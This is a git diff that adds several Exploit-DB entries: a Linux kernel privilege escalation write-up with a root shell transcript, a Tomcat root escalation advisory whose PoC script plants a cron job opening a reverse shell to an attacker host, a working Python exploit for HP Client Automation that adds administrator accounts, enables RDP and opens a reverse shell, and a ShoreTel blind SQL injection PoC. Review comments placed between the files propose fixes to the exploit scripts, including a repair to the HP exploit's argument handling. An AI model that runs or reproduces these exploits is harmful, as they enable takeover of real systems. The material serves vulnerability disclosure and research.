diff --git a/files.csv b/files.csv
index 9dec1da3b..cde6f0e23 100755
--- a/files.csv
+++ b/files.csv
@@ -36598,6 +36598,15 @@ id,file,description,date,author,platform,type,port
 40477,platforms/windows/local/40477.txt,"BlueStacks 2.5.55 - Unquoted Service Path Privilege Escalation",2016-10-07,Th3GundY,windows,local,0
 40478,platforms/windows/local/40478.txt,"Waves Audio Service - Unquoted Service Path Privilege Escalation",2016-10-07,"Ross Marks",windows,local,0
 40480,platforms/php/webapps/40480.txt,"miniblog 1.0.1 - Cross-Site Request Forgery (Add New Post)",2016-10-09,Besim,php,webapps,0
+40481,platforms/php/webapps/40481.txt,"ShoreTel Connect ONSITE - Blind SQL Injection",2016-09-19,"Iraklis Mathiopoulos",php,webapps,0
 40482,platforms/windows/local/40482.txt,"Fitbit Connect Service - Unquoted Service Path Privilege Escalation",2016-10-09,"Ross Marks",windows,local,0
+40483,platforms/windows/local/40483.txt,"Leap Service - Unquoted Service Path Privilege Escalation",2016-10-09,"Ross Marks",windows,local,0
+40484,platforms/windows/local/40484.txt,"Wacom Consumer Service - Unquoted Service Path Privilege Escalation",2016-10-09,"Ross Marks",windows,local,0
+40485,platforms/windows/local/40485.txt,"Foxit Cloud Update Service - Unquoted Service Path Privilege Escalation",2016-10-09,"Ross Marks",windows,local,0
 40486,platforms/php/webapps/40486.txt,"PHP Press Release - Cross-Site Request Forgery (Add Admin)",2016-10-09,Besim,php,webapps,0
 40487,platforms/php/webapps/40487.txt,"PHP Press Release - Stored Cross Site Scripting",2016-10-09,Besim,php,webapps,0
+40488,platforms/linux/local/40488.txt,"Apache Tomcat 8/7/6 (RedHat-Based Distros) - Privilege Escalation",2016-10-10,"Dawid Golunski",linux,local,0
+40489,platforms/lin_x86-64/local/40489.txt,"Linux Kernel 4.6.2 (Ubuntu 16.04.1) - IP6T_SO_SET_REPLACE Privilege Escalation",2016-10-10,"Qian Zhang",lin_x86-64,local,0
+40490,platforms/windows/local/40490.txt,"Zend Studio IDE 13.5.1 - Insecure File Permissions Privilege Escalation",2016-10-10,hyp3rlinx,windows,local,0
+40491,platforms/multiple/remote/40491.py,"HP Client - Automation Command Injection / Remote Code Execution",2016-10-10,SlidingWindow,multiple,remote,0
+40492,platforms/php/webapps/40492.html,"Maian Weblog 4.0 - Cross-Site Request Forgery (Add New Post)",2016-10-10,Besim,php,webapps,0
diff --git a/platforms/lin_x86-64/local/40489.txt b/platforms/lin_x86-64/local/40489.txt
new file mode 100755
index 000000000..6f1829ea6
--- /dev/null
+++ b/platforms/lin_x86-64/local/40489.txt
@@ -0,0 +1,42 @@ +# Exploit Title: Linux kernel <= 4.6.2 - Local Privileges Escalation via IP6T_SO_SET_REPLACE compat setsockopt call +# Date: 2016.10.8 +# Exploit Author: Qian Zhang@MarvelTeam Qihoo 360 +# Version: Linux kernel <= 4.6.2 +# Tested on: Ubuntu 16.04.1 LTS Linux 4.4.0-21-generic +# CVE: CVE-2016-4997 +# Reference:http://www.openwall.com/lists/oss-security/2016/09/29/10 +# Contact: tyrande000@gmail.com + +#DESCRIPTION +#=========== +#The IPv6 netfilter subsystem in the Linux kernel through 4.6.2 does not validate certain offset fields, +#which allows local users to escalade privileges via an IP6T_SO_SET_REPLACE compat setsockopt call with ip6_tables module loaded. + +zhang_q@ubuntu:~/ipv6_IP6T_SO_SET_REPLACE$ ls +compile.sh enjoy enjoy.c pwn pwn.c version.h +zhang_q@ubuntu:~/ipv6_IP6T_SO_SET_REPLACE$ sudo modprobe ip6_tables +[sudo] password for zhang_q: +zhang_q@ubuntu:~/ipv6_IP6T_SO_SET_REPLACE$ ./pwn +pwn begin, let the bullets fly . . . +and wait for a minute . . . +pwn over, let's enjoy! +preparing payload . . . +trigger modified tty_release . . . +got root, enjoy :) +root@ubuntu:~/ipv6_IP6T_SO_SET_REPLACE# +root@ubuntu:~/ipv6_IP6T_SO_SET_REPLACE# id +uid=0(root) gid=0(root) groups=0(root) +root@ubuntu:~/ipv6_IP6T_SO_SET_REPLACE# hostnamectl + Static hostname: ubuntu + Icon name: computer-vm + Chassis: vm + Machine ID: 355cdf4ce8a048288640c2aa933c018f + Virtualization: vmware + Operating System: Ubuntu 16.04.1 LTS + Kernel: Linux 4.4.0-21-generic + Architecture: x86-64 +root@ubuntu:~/ipv6_IP6T_SO_SET_REPLACE# + + +Proof of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40489.zip \ No newline at end of file diff --git a/platforms/linux/local/40488.txt b/platforms/linux/local/40488.txt new file mode 100755 index 000000000..8081a4206 --- /dev/null +++ b/platforms/linux/local/40488.txt 
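Review bot: The transcript runs `sudo modprobe ip6_tables` before `./pwn`, so in the demonstrated run root satisfied the advisory's own precondition ("with ip6_tables module loaded"); the write-up should state whether that module is loaded by default or autoloads for an unprivileged caller on the tested Ubuntu 16.04.1 image, because that decides whether a stock system is exposed at all. A header line such as `# Precondition: ip6_tables must already be loaded (the run below loads it with sudo)` would make the scope explicit. For defenders the relevant action is the kernel update: the header says "<= 4.6.2", and to my recollection the upstream fix for CVE-2016-4997 landed in the 4.6.3 stable release, which could be cited next to the oss-security link. "escalade privileges" in the DESCRIPTION block should read "escalate privileges".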
@@ -0,0 +1,283 @@ +============================================= +- Discovered by: Dawid Golunski +- http://legalhackers.com +- dawid (at) legalhackers.com + +- CVE-2016-5425 +- Release date: 10.10.2016 +- Revision: 1 +- Severity: High +============================================= + + +I. VULNERABILITY +------------------------- + +Apache Tomcat (packaging on RedHat-based distros) - Root Privilege Escalation + + +II. BACKGROUND +------------------------- + +"The Apache Tomcat® software is an open source implementation of the +Java Servlet, JavaServer Pages, Java Expression Language and Java WebSocket +technologies. The Java Servlet, JavaServer Pages, Java Expression Language +and Java WebSocket specifications are developed under the Java Community +Process. + +The Apache Tomcat software is developed in an open and participatory +environment and released under the Apache License version 2. +The Apache Tomcat project is intended to be a collaboration of the +best-of-breed developers from around the world. + +Apache Tomcat software powers numerous large-scale, mission-critical web +applications across a diverse range of industries and organizations. +Some of these users and their stories are listed on the PoweredBy wiki page. +" + +http://tomcat.apache.org/ + + +III. INTRODUCTION +------------------------- + +Apache Tomcat packages provided by default repositories of RedHat-based +distributions (including CentOS, RedHat, OracleLinux, Fedora, etc.) +create a tmpfiles.d configuration file with insecure permissions which +allow attackers who are able to write files with tomcat user permissions +(for example, through a vulnerability in web application hosted on Tomcat) +to escalate their privileges from tomcat user to root and fully compromise +the target system. + + +IV. 
DESCRIPTION +------------------------- + +The vulnerability stems from the tomcat.conf file installed by default +by packages on RedHat-based systems with write permissions for the tomcat +group: + +[root@centos7 ~]# ls -al /usr/lib/tmpfiles.d/tomcat.conf +-rw-rw-r--. 1 root tomcat 361 Oct 9 23:58 /usr/lib/tmpfiles.d/tomcat.conf + +The configuration files in tmpfiles.d are used by systemd-tmpfiles to manage +temporary files including their creation. + +Attackers could very easily exploit the weak permissions on tomcat.conf to +inject configuration that creates a rootshell or remote reverse shell that +allows them to execute arbitrary commands with root privileges. + +Injected malicious settings would be processed whenever +/usr/bin/systemd-tmpfiles gets executed. + +systemd-tmpfiles is executed by default on boot on RedHat-based systems +through systemd-tmpfiles-setup.service service as can be seen below: + + +---[ /usr/lib/systemd/system/systemd-tmpfiles-setup.service ]--- + +[...] +ExecStart=/usr/bin/systemd-tmpfiles --create --remove --boot --exclude-prefix=/dev + +---------------------------------------------------------------- + +Depending on the system in use, the execution of systemd-tmpfiles could also +be triggered by other services, cronjobs, startup scripts etc. + + +The vulnerability could potentially get exploited by remote attackers in +combination with a vulnerable web application hosted on Tomcat if they +managed to find a path traversal (e.g in a file upload feature) or an arbitrary +file write/append vulnerability. This would allow them to append settings +to /usr/lib/tmpfiles.d/tomcat.conf file and achieve code execution with root +privileges without a prior local access/shell on the system. 
+This vector could prove useful to attackers, for example if they were unable to +obtain a tomcat-privileged shell/codeexec by uploading a .jsp webshell through a +vulnerable file upload feature due to restrictions imposed by Tomcat security +manager, or a read-only webroot etc. + +It is worth to note that systemd-tmpfiles does not stop on syntax errors when +processing configuration files which makes exploitation easier as attackers only +need to inject their payload after a new line and do not need to worry +about garbage data potentially prepended by a vulnerable webapp in case of +Arbitrary File Write/Append exploitation. + + + +V. PROOF OF CONCEPT EXPLOIT +------------------------- + +-----------[ tomcat-RH-root.sh ]--------- + +#!/bin/bash +# Apache Tomcat packaging on RedHat-based distros - Root Privilege Escalation PoC Exploit +# CVE-2016-5425 +# +# Full advisory at: +# http://legalhackers.com/advisories/Tomcat-RedHat-Pkgs-Root-PrivEsc-Exploit-CVE-2016-5425.html +# +# Discovered and coded by: +# Dawid Golunski +# http://legalhackers.com +# +# Tested on RedHat, CentOS, OracleLinux, Fedora systems. +# +# For testing purposes only. +# + +ATTACKER_IP=127.0.0.1 +ATTACKER_PORT=9090 + +echo -e "\n* Apache Tomcat (RedHat distros) - Root PrivEsc PoC CVE-2016-5425 *" +echo -e " Discovered by Dawid Golunski\n" +echo "[+] Checking vulnerability" +ls -l /usr/lib/tmpfiles.d/tomcat.conf | grep 'tomcat' +if [ $? -ne 0 ]; then + echo "Not vulnerable or tomcat installed under a different user than 'tomcat'" + exit 1 +fi +echo -e "\n[+] Your system is vulnerable!" + +echo -e "\n[+] Appending data to /usr/lib/tmpfiles.d/tomcat.conf..." 
+cat<<_eof_>>/usr/lib/tmpfiles.d/tomcat.conf +C /usr/share/tomcat/rootsh 4770 root root - /bin/bash +z /usr/share/tomcat/rootsh 4770 root root - +F /etc/cron.d/tomcatexploit 0644 root root - "* * * * * root nohup bash -i >/dev/tcp/$ATTACKER_IP/$ATTACKER_PORT 0<&1 2>&1 & \n\n" +_eof_ + +echo "[+] /usr/lib/tmpfiles.d/tomcat.conf contains:" +cat /usr/lib/tmpfiles.d/tomcat.conf +echo -e "\n[+] Payload injected! Wait for your root shell...\n" +echo -e "Once '/usr/bin/systemd-tmpfiles --create' gets executed (on reboot by tmpfiles-setup.service, by cron, by another service etc.), +the rootshell will be created in /usr/share/tomcat/rootsh. +Additionally, a reverse shell should get executed by crond shortly after and connect to $ATTACKER_IP:$ATTACKER_PORT \n" + + +--------------[ eof ]-------------------- + + +Example run: + +-bash-4.2$ rpm -qa | grep -i tomcat +tomcat-7.0.54-2.el7_1.noarch + +-bash-4.2$ cat /etc/redhat-release +CentOS Linux release 7.2.1511 (Core) + +-bash-4.2$ id +uid=91(tomcat) gid=91(tomcat) groups=91(tomcat) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 + +-bash-4.2$ ./tomcat-RH-root.sh + +* Apache Tomcat (RedHat distros) - Root PrivEsc PoC CVE-2016-5425 * + Discovered by Dawid Golunski + +[+] Checking vulnerability +-rw-rw-r--. 1 root tomcat 43 Oct 10 02:39 /usr/lib/tmpfiles.d/tomcat.conf + +[+] Your system is vulnerable! + +[+] Appending data to /usr/lib/tmpfiles.d/tomcat.conf... +[+] /usr/lib/tmpfiles.d/tomcat.conf contains: +f /var/run/tomcat.pid 0644 tomcat tomcat - +C /usr/share/tomcat/rootsh 4770 root root - /bin/bash +z /usr/share/tomcat/rootsh 4770 root root - +F /etc/cron.d/tomcatexploit 0644 root root - "* * * * * root nohup bash -i >/dev/tcp/127.0.0.1/9090 0<&1 2>&1 & \n\n" + +[+] Payload injected! Wait for your root shell... + +Once '/usr/bin/systemd-tmpfiles --create' gets executed (on reboot by tmpfiles-setup.service, by cron, by another service etc.), +the rootshell will be created in /usr/share/tomcat/rootsh. 
+Additionally, a reverse shell should get executed by crond shortly after and connect to 127.0.0.1:9090 + +-bash-4.2$ nc -l -p 9090 +bash: no job control in this shell +[root@centos7 ~]# id +id +uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:system_cronjob_t:s0-s0:c0.c1023 + +[root@centos7 ~]# ls -l /usr/share/tomcat/rootsh +ls -l /usr/share/tomcat/rootsh +-rwsrwx---. 1 root root 960392 Aug 2 12:00 /usr/share/tomcat/rootsh +[root@centos7 ~]# + + + +VI. BUSINESS IMPACT +------------------------- + +Attackers who have gained access to tomcat user account or the ability to +write files as tomcat user could escalate their privileges to root and fully +compromise the affected system. + +As explained in section IV., the vulnerability could potentially get exploited +by remote attackers in combination with certain web application vulnerabilities +to achieve command execution without prior shell access. + + +VII. SYSTEMS AFFECTED +------------------------- + +Multiple versions of Tomcat packages on RedHat-based systems are affected. + +The vulnerability was confirmed on Tomcat installed from default repositories +on the following systems: + +- CentOS +- Fedora +- Oracle Linux +- RedHat + +Refer to information provided by your distribution to obtain an exact list +of vulnerable packages. + + +Detailes provided by RedHat can be found at: + +https://access.redhat.com/security/cve/CVE-2016-5425 + + +VIII. SOLUTION +------------------------- + +Adjust permissions on /usr/lib/tmpfiles.d/tomcat.conf file to remove write +permission for the tomcat group. + +Alternatively, update to the latest packages provided by your distribution. +Confirm the file permissions after the update. + + +IX. 
REFERENCES +------------------------- + +http://legalhackers.com + +http://legalhackers.com/advisories/Tomcat-RedHat-Pkgs-Root-PrivEsc-Exploit-CVE-2016-5425.html + +The source code of the exploit (tomcat-RH-root.sh) can be downloaded from: +http://legalhackers.com/exploits/tomcat-RH-root.sh + +CVE-2016-5425 +http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5425 + +https://access.redhat.com/security/cve/CVE-2016-5425 + + +X. CREDITS +------------------------- + +The vulnerability has been discovered by Dawid Golunski +dawid (at) legalhackers (dot) com +http://legalhackers.com + +XI. REVISION HISTORY +------------------------- + +10.10.2016 - Advisory released + +XII. LEGAL NOTICES +------------------------- + +The information contained within this advisory is supplied "as-is" with +no warranties or guarantees of fitness of use or otherwise. I accept no +responsibility for any damage caused by the use or misuse of this information. \ No newline at end of file diff --git a/platforms/multiple/remote/40491.py b/platforms/multiple/remote/40491.py new file mode 100755 index 000000000..620d2a729 --- /dev/null +++ b/platforms/multiple/remote/40491.py 
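Review bot: The vulnerability check in the PoC script, `ls -l /usr/lib/tmpfiles.d/tomcat.conf | grep 'tomcat'`, matches whenever the file exists because the path itself contains "tomcat", so it never tests the group or the write bit and the "Not vulnerable" branch is effectively dead. A check that tests the condition the advisory actually describes is `[[ -w /usr/lib/tmpfiles.d/tomcat.conf ]] || { echo "Not vulnerable: tomcat.conf is not writable by this user"; exit 1; }`, which is also what an administrator can run as the tomcat user to confirm the fix from section VIII. The Solution section would be stronger with a verification command, e.g. `stat -c '%A %U:%G' /usr/lib/tmpfiles.d/tomcat.conf` showing no group write bit, and with a detection hint that any write to /usr/lib/tmpfiles.d/ by a service account is anomalous and worth an audit watch. "Detailes provided by RedHat" should read "Details provided by RedHat".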
@@ -0,0 +1,212 @@ +# Exploit Title: [HP Client - Automation Command Injection] +# Date: [10/10/2016] +# Exploit Author: [SlidingWindow] , Twitter: @kapil_khot +# Vendor Homepage: [Previosuly HP, now http://www.persistentsys.com/] +# Version: [Tested on version 7.9 but should work on 8.1, 9.0, 9.1 too] +# Tested on: [Windows 7 and CentOS release 6.7 (Final)] +# CVE : [CVE-2015-1497] + +#Can run following commands on linux target + #Useradd Payload: hide hide sh -c ' useradd amiroot -p ID/JlXFIWowsE -g root' + #Reverse Shell Payload: hide hide sh -c "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.35.140\",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'" + + +#Runs following commands on Windows target + #hide hide cmd.exe /c net user hack3r "hack3r" /add + #hide hide cmd.exe /c net localgroup administrators hack3r /add + #hide hide cmd.exe /c net localgroup "Remote Desktop Users" hack3r /add + #hide hide cmd.exe /c netsh firewall set service RemoteDesktop enable + #hide hide cmd/exe /c netsh firewall set service type=RemoteDesktop mode=enable profile=ALL + #hide hide cmd/exe /c reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f + + +import sys,socket + +print("\n# Exploit Title: [HP Client - Automation Command Injection]\n# Date: [10/10/2016]\n# Exploit Author: [SlidingWindow] , Twitter: @kapil_khot\n# Vendor Homepage: [Previosuly HP, now http://www.persistentsys.com/]\n# Version: [7.9, 8.1, 9.0, 9.1]\n# Tested on: [Windows 7, CentOS release 6.7 (Final)]\n# CVE : [CVE-2015-1497]\n") + +def exploit_Linux(target_IP,exploit_param): + if exploit_param == "1": + print("\n[+]Adding privileged user amiroot/nopass") + request = "\x00" + request+= "\x31\x32\x33\x31\x32\x33\x00" + request+= "\x41\x42\x43\x00" + request+= 
"\x68\x69\x64\x65\x20\x68\x69\x64\x65\x09\x73\x68\x20\x2d\x63\x20\x27\x20\x75\x73\x65\x72\x61\x64\x64\x20\x61\x6d\x69\x72\x6f\x6f\x74\x20\x2d\x70\x20\x49\x44\x2f\x4a\x6c\x58\x46\x49\x57\x6f\x77\x73\x45\x20\x20\x2d\x67\x20\x72\x6f\x6f\x74\x27\x00" + + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.connect((target_IP, 3465)) + s.send(request) + + response = s.recv(1024) + + if response == "\x00": + print("[+]Successfully added user amiroot/nopass") + else: + print("[-]Failed to add user amiroot/nopass") + s.close() + + elif exploit_param == "2": + print("\n[+]Trying to get a reverse shell") + request = "\x00" + request+= "\x31\x32\x33\x31\x32\x33\x00" + request+= "\x41\x42\x43\x00" + + #Change this + #Reverse Shell Payload: hide hide sh -c "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.35.140\",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'" + request+= 
"\x68\x69\x64\x65\x20\x68\x69\x64\x65\x09\x73\x68\x20\x2d\x63\x20\x22\x70\x79\x74\x68\x6f\x6e\x20\x2d\x63\x20\x27\x69\x6d\x70\x6f\x72\x74\x20\x73\x6f\x63\x6b\x65\x74\x2c\x73\x75\x62\x70\x72\x6f\x63\x65\x73\x73\x2c\x6f\x73\x3b\x73\x3d\x73\x6f\x63\x6b\x65\x74\x2e\x73\x6f\x63\x6b\x65\x74\x28\x73\x6f\x63\x6b\x65\x74\x2e\x41\x46\x5f\x49\x4e\x45\x54\x2c\x73\x6f\x63\x6b\x65\x74\x2e\x53\x4f\x43\x4b\x5f\x53\x54\x52\x45\x41\x4d\x29\x3b\x73\x2e\x63\x6f\x6e\x6e\x65\x63\x74\x28\x28\x5c\x22\x31\x30\x2e\x31\x30\x2e\x33\x35\x2e\x31\x34\x30\x5c\x22\x2c\x34\x34\x33\x29\x29\x3b\x6f\x73\x2e\x64\x75\x70\x32\x28\x73\x2e\x66\x69\x6c\x65\x6e\x6f\x28\x29\x2c\x30\x29\x3b\x20\x6f\x73\x2e\x64\x75\x70\x32\x28\x73\x2e\x66\x69\x6c\x65\x6e\x6f\x28\x29\x2c\x31\x29\x3b\x20\x6f\x73\x2e\x64\x75\x70\x32\x28\x73\x2e\x66\x69\x6c\x65\x6e\x6f\x28\x29\x2c\x32\x29\x3b\x70\x3d\x73\x75\x62\x70\x72\x6f\x63\x65\x73\x73\x2e\x63\x61\x6c\x6c\x28\x5b\x5c\x22\x2f\x62\x69\x6e\x2f\x73\x68\x5c\x22\x2c\x5c\x22\x2d\x69\x5c\x22\x5d\x29\x3b\x27\x22\x00" + + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.connect((target_IP, 3465)) + s.send(request) + + response = s.recv(1024) + + if response == "\x00": + print("[+]Exploit completed successfully.\n[+]Try to SSH into the target with username/password: amiroot/nopass") + else: + print("[-]Failed to get reverse shell") + s.close() + + else: + print("\n[-]Invalid exploit parameter provided for Linux target") + sys.exit() + + +def exploit_Windows(target_IP): + + counter = 0 + print("[+]Adding a local user hack3r/hack3r") + + request = "\x00" + request+= "\x31\x32\x33\x31\x32\x33\x00" + request+= "\x41\x42\x43\x00" + request+= "\x68\x69\x64\x65\x20\x68\x69\x64\x65\x09\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20\x6e\x65\x74\x20\x75\x73\x65\x72\x20\x68\x61\x63\x6b\x33\x72\x20\x22\x68\x61\x63\x6b\x33\x72\x22\x20\x2f\x61\x64\x64\x00" + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.connect((target_IP, 3465)) + s.send(request) + + response = s.recv(1024) + + if 
response == "\x00": + print("[+]Successfully added user hack3r/hack3r") + counter+= 1 + else: + print("[-]Failed to add user hack3r/hack3r") + s.close() + + + print("[+]Adding user 'hack3r' to Local Administrator's group") + request = "\x00" + request+= "\x31\x32\x33\x31\x32\x33\x00" + request+= "\x41\x42\x43\x00" + request+= "\x68\x69\x64\x65\x20\x68\x69\x64\x65\x09\x6e\x65\x74\x20\x6c\x6f\x63\x61\x6c\x67\x72\x6f\x75\x70\x20\x61\x64\x6d\x69\x6e\x69\x73\x74\x72\x61\x74\x6f\x72\x73\x20\x68\x61\x63\x6b\x33\x72\x20\x2f\x61\x64\x64\x00" + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.connect((target_IP, 3465)) + s.send(request) + response = s.recv(1024) + + if response == "\x00": + print("[+]Successfully added user 'hack3r' to Local Administrators group") + counter+= 1 + else: + print("[-]Failed to add user to 'hack3r' Local Administrators group") + s.close() + + #Add user Hack3r to "Remote Desktop Users" Group + print("[+]Adding user 'hack3r' to 'Remote Desktop Users' group") + request = "\x00" + request+= "\x31\x32\x33\x31\x32\x33\x00" + request+= "\x41\x42\x43\x00" + request+= "\x68\x69\x64\x65\x20\x68\x69\x64\x65\x09\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20\x6e\x65\x74\x20\x6c\x6f\x63\x61\x6c\x67\x72\x6f\x75\x70\x20\x22\x52\x65\x6d\x6f\x74\x65\x20\x44\x65\x73\x6b\x74\x6f\x70\x20\x55\x73\x65\x72\x73\x22\x20\x68\x61\x63\x6b\x33\x72\x20\x2f\x61\x64\x64\x00" + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.connect((target_IP, 3465)) + s.send(request) + response = s.recv(1024) + + if response == "\x00": + print("[+]Successfully added user 'hack3r' to 'Remote Desktop Users' group") + counter+= 1 + else: + print("[-]Failed to add user 'hack3r' to 'Remote Desktop Users' group") + s.close() + + #Enable RDP + print("[+]Trying to enable Remote Desktop Service") + request = "\x00" + request+= "\x31\x32\x33\x31\x32\x33\x00" + request+= "\x41\x42\x43\x00" + request+= 
"\x68\x69\x64\x65\x20\x68\x69\x64\x65\x09\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20\x6e\x65\x74\x73\x68\x20\x66\x69\x72\x65\x77\x61\x6c\x6c\x20\x73\x65\x74\x20\x73\x65\x72\x76\x69\x63\x65\x20\x52\x65\x6d\x6f\x74\x65\x44\x65\x73\x6b\x74\x6f\x70\x20\x65\x6e\x61\x62\x6c\x65\x00" + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.connect((target_IP, 3465)) + s.send(request) + response = s.recv(1024) + + if response == "\x00": + print("[+]Successfully enabled Remote Desktop Service") + counter+= 1 + else: + print("[-]Failed to enable Remote Desktop Service") + s.close() + + + #Enable RDP for all profiles + print("[+]Trying to enable Remote Desktop Service for all firewall profiles") + request = "\x00" + request+= "\x31\x32\x33\x31\x32\x33\x00" + request+= "\x41\x42\x43\x00" + request+= "\x68\x69\x64\x65\x20\x68\x69\x64\x65\x09\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20\x6e\x65\x74\x73\x68\x20\x66\x69\x72\x65\x77\x61\x6c\x6c\x20\x73\x65\x74\x20\x73\x65\x72\x76\x69\x63\x65\x20\x74\x79\x70\x65\x3d\x52\x65\x6d\x6f\x74\x65\x44\x65\x73\x6b\x74\x6f\x70\x20\x6d\x6f\x64\x65\x3d\x65\x6e\x61\x62\x6c\x65\x20\x70\x72\x6f\x66\x69\x6c\x65\x3d\x41\x4c\x4c\x00" + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.connect((target_IP, 3465)) + s.send(request) + response = s.recv(1024) + + if response == "\x00": + print("[+]Successfully enabled Remote Desktop Service for all firewall profiles") + counter+= 1 + else: + print("[-]Failed to enable Remote Desktop Service for all firewall profiles") + s.close() + + #Setup target to listen for RDP connections + print("[+]Setting up the target server to listen to RDP connections") + request = "\x00" + request+= "\x31\x32\x33\x31\x32\x33\x00" + request+= "\x41\x42\x43\x00" + request+= 
"\x68\x69\x64\x65\x20\x68\x69\x64\x65\x09\x09\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20\x72\x65\x67\x20\x61\x64\x64\x20\x22\x48\x4b\x45\x59\x5f\x4c\x4f\x43\x41\x4c\x5f\x4d\x41\x43\x48\x49\x4e\x45\x5c\x53\x59\x53\x54\x45\x4d\x5c\x43\x75\x72\x72\x65\x6e\x74\x43\x6f\x6e\x74\x72\x6f\x6c\x53\x65\x74\x5c\x43\x6f\x6e\x74\x72\x6f\x6c\x5c\x54\x65\x72\x6d\x69\x6e\x61\x6c\x20\x53\x65\x72\x76\x65\x72\x22\x20\x2f\x76\x20\x66\x44\x65\x6e\x79\x54\x53\x43\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x73\x20\x2f\x74\x20\x52\x45\x47\x5f\x44\x57\x4f\x52\x44\x20\x2f\x64\x20\x30\x20\x2f\x66\x00" + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.connect((target_IP, 3465)) + s.send(request) + response = s.recv(1024) + + if response == "\x00": + print("[+]Successfully setup the target server to listen to RDP connections") + counter+= 1 + else: + print("[-]Failed to setup the target server to listen to RDP connections") + s.close() + + if counter == 6: + print("\n[+]Exploit completed successfully. Try RDP to the target with username/password: hack3r/hack3r") + else: + print("\n[-]Exploit Failed..") + +#main() function here +def main(): + + if len(sys.argv) < 2: + print "\n[-]Usage: \nWindows Target:\n\tpython HP_Client_Automation_Exploit.py Windows\n\nLinux Target:\n\tpython HP_Client_Automation_Exploit.py Linux [1|2]\n\t\t1.Add user\n\t\t2.Reverse Shell" + sys.exit() + + target_IP = sys.argv[1] + target_OS = sys.argv[2].lower() + + if target_OS == "windows": + exploit_Windows(target_IP) + elif target_OS == "linux": + exploit_param = sys.argv[3] + exploit_Linux(target_IP,exploit_param) + else: + print("\n[-]Invalid taret Operating System selected.") + sys.exit() + +if __name__ == '__main__': + main() diff --git a/platforms/php/webapps/40481.txt b/platforms/php/webapps/40481.txt new file mode 100755 index 000000000..e500224cb --- /dev/null +++ b/platforms/php/webapps/40481.txt 
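Review bot: The usage text in `main()` does not match the argument layout the code reads: it shows `python HP_Client_Automation_Exploit.py Windows` with no address, while the code takes `sys.argv[1]` as the target IP, `sys.argv[2]` as the OS and `sys.argv[3]` as the Linux mode, and the guard `len(sys.argv) < 2` lets a two-argument invocation reach `sys.argv[2]` and die with an IndexError instead of the usage message. The usage string should read `... <target_IP> Windows` and `... <target_IP> Linux [1|2]`, and the guard should require three arguments (four when the OS is Linux) so the usage path is actually taken. Separately, the success message in the Linux mode-2 branch tells the user to SSH as amiroot/nopass, which is the mode-1 outcome, not the reverse-shell one. "Invalid taret Operating System" should read "Invalid target Operating System".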
@@ -0,0 +1,87 @@ +# Exploit Title: ShoreTel Connect ONSITE Blind SQL Injection Vulnerability +# Date: 19-09-2016 +# Software Link: +https://www.shoretel.com/resource-center/shoretel-connect-onsite-overview +# Exploit Author: Iraklis Mathiopoulos +# Contact: https://twitter.com/_imath_ +# Website: https://medium.com/@iraklis +# Category: webapps + +1. Description + +Versions of ShoreTel Connect ONSITE prior and including 21.79.4311.0 +are vulnerable to a Blind SQL Injection in /authenticate.php, on the webserver +that is running the Conference system. + +Specifically, the POST parameter "username" is not sanitised prior to being used +in SQL Queries. Using test'%20and%20(select*from(select(sleep(35)))a)--%20 +for the username value the server will respond after approximately 35 seconds. + +No authentication is needed in order to exploit the vulnerability as the issue +resides in the pre-authentication realm of the system. + + +2. Proof of Concept + +req.burp: +--- +POST https://[REDACTED].com/authenticate.php HTTP/1.1 +Host: [REDACTED].com +User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) +Gecko/20100101 Firefox/47.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate, br +Referer: https://[REDACTED].com/signin.php?ret=index.php&brand=1&brandUrl=index.php&rand=377311852 +Cookie: PHPSESSID=fd3eb46033541487cce7774b917c655d +Connection: close +Content-Type: application/x-www-form-urlencoded +Content-Length: 197 + +password=cc03e747a6afbbcbf8be7668acfebee5&password64=dGVzdDEyMw%3D%3D&redirect=&redirectOnFail=&ticketAsQuery=1&expiry=43200&flashlogin=&ParticipantCode=&username=test123&vpassword=&SUBMIT1=Sign+In +- --- + +root@kali:~/projects# sqlmap -r req.burp -p username --dbms=mysql +--technique=T --time-sec=10 --level=5 --risk=3 --current-db + _ + ___ ___| |_____ ___ ___ {1.0-dev-nongit-201607120a89} +|_ -| . | | | .'| . 
